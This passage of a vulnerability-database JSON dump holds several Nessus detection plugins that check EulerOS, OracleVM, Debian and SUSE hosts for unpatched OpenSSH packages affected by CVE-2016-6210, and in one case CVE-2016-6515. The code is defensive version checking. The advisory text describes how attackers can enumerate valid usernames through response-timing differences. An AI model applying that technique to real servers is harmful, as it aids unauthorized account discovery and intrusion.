Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-08T00:00:00", "title": "EulerOS 2.0 SP1 : openssh (EulerOS-SA-2017-1189)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:openssh-askpass", "p-cpe:/a:huawei:euleros:openssh-clients", "p-cpe:/a:huawei:euleros:openssh-keycat", "p-cpe:/a:huawei:euleros:openssh-server", "p-cpe:/a:huawei:euleros:openssh", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1189.NASL", "href": "https://www.tenable.com/plugins/nessus/103027", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103027);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-6210\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : openssh (EulerOS-SA-2017-1189)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the openssh packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A covert timing channel flaw was found in the way\n OpenSSH handled authentication of non-existent users. A\n remote unauthenticated attacker could possibly use this\n flaw to determine valid user names by measuring the\n timing of server responses. (CVE-2016-6210)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1189\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7edce972\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssh package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"openssh-6.6.1p1-28.h13\",\n \"openssh-askpass-6.6.1p1-28.h13\",\n \"openssh-clients-6.6.1p1-28.h13\",\n \"openssh-keycat-6.6.1p1-28.h13\",\n \"openssh-server-6.6.1p1-28.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": 
"2021-01-07T08:52:27", "description": "According to the version of the openssh packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A covert timing channel flaw was found in the way\n OpenSSH handled authentication of non-existent users. A\n remote unauthenticated attacker could possibly use this\n flaw to determine valid user names by measuring the\n timing of server responses. (CVE-2016-6210)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-08T00:00:00", "title": "EulerOS 2.0 SP2 : openssh (EulerOS-SA-2017-1190)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:openssh-askpass", "p-cpe:/a:huawei:euleros:openssh-clients", "p-cpe:/a:huawei:euleros:openssh-keycat", "p-cpe:/a:huawei:euleros:openssh-server", "p-cpe:/a:huawei:euleros:openssh", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/103028", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103028);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-6210\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : openssh (EulerOS-SA-2017-1190)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"According to the version of the openssh packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A covert timing channel flaw was found in the way\n OpenSSH handled authentication of non-existent users. A\n remote unauthenticated attacker could possibly use this\n flaw to determine valid user names by measuring the\n timing of server responses. (CVE-2016-6210)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1190\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf37839d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssh package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:huawei:euleros:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"openssh-6.6.1p1-28.h13\",\n \"openssh-askpass-6.6.1p1-28.h13\",\n \"openssh-clients-6.6.1p1-28.h13\",\n \"openssh-keycat-6.6.1p1-28.h13\",\n \"openssh-server-6.6.1p1-28.h13\"];\n\nforeach (pkg in pkgs)\n if 
(rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T13:24:16", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix for CVE-2016-6210: User enumeration via covert\n timing channel (#1357442)", "edition": 24, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-01T00:00:00", "title": "OracleVM 3.3 / 3.4 : openssh (OVMSA-2017-0150)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-01T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:openssh-clients", "p-cpe:/a:oracle:vm:openssh", "p-cpe:/a:oracle:vm:openssh-server"], "id": "ORACLEVM_OVMSA-2017-0150.NASL", "href": "https://www.tenable.com/plugins/nessus/102908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0150.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102908);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-6210\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : openssh (OVMSA-2017-0150)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix for CVE-2016-6210: User enumeration via covert\n timing channel (#1357442)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-August/000777.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?02191c63\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-August/000778.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7db061dc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected openssh / openssh-clients / openssh-server\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-clients / openssh-server\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:49:43", "description": "Eddie Harari reported that the OpenSSH SSH daemon allows user\nenumeration through timing differences when trying to authenticate\nusers. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the\nBlowfish algorithm. If real users passwords are hashed using\nSHA256/SHA512, then a remote attacker can take advantage of this flaw\nby sending large passwords, receiving shorter response times from the\nserver for non-existing users.", "edition": 25, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-07-25T00:00:00", "title": "Debian DSA-3626-1 : openssh - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-25T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:openssh"], "id": "DEBIAN_DSA-3626.NASL", "href": "https://www.tenable.com/plugins/nessus/92526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3626. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92526);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"DSA\", value:\"3626\");\n\n script_name(english:\"Debian DSA-3626-1 : openssh - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Eddie Harari reported that the OpenSSH SSH daemon allows user\nenumeration through timing differences when trying to authenticate\nusers. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the\nBlowfish algorithm. 
If real users passwords are hashed using\nSHA256/SHA512, then a remote attacker can take advantage of this flaw\nby sending large passwords, receiving shorter response times from the\nserver for non-existing users.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/openssh\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssh packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:6.7p1-5+deb8u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"openssh-client\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"openssh-client-udeb\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"openssh-server\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"openssh-server-udeb\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"openssh-sftp-server\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ssh\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ssh-askpass-gnome\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ssh-krb5\", reference:\"1:6.7p1-5+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T14:24:41", "description": "This update for openssh fixes the following issues :\n\n - Prevent user enumeration through the timing of password\n processing (bsc#989363, CVE-2016-6210)\n [-prevent_timing_user_enumeration]\n\n - Allow lowering the DH groups parameter limit in server\n as well as when GSSAPI key exchange is used (bsc#948902)\n\n 
- limit accepted password length (prevents possible DoS)\n (bsc#992533, CVE-2016-6515) Bug fixes :\n\n - avoid complaining about unset DISPLAY variable\n (bsc#981654)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-13T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:2280-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "modified": "2016-09-13T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2016-2280-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93455", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2280-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93455);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-6210\", \"CVE-2016-6515\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:2280-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\n - Prevent user enumeration through the timing of password\n processing (bsc#989363, CVE-2016-6210)\n [-prevent_timing_user_enumeration]\n\n - Allow lowering the DH groups parameter limit in server\n as well as when GSSAPI key exchange is used (bsc#948902)\n\n - limit accepted password length (prevents possible DoS)\n (bsc#992533, CVE-2016-6515) Bug fixes :\n\n - avoid complaining about unset DISPLAY variable\n (bsc#981654)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=948902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=989363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6210/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6515/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162280-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b9954ae3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product 
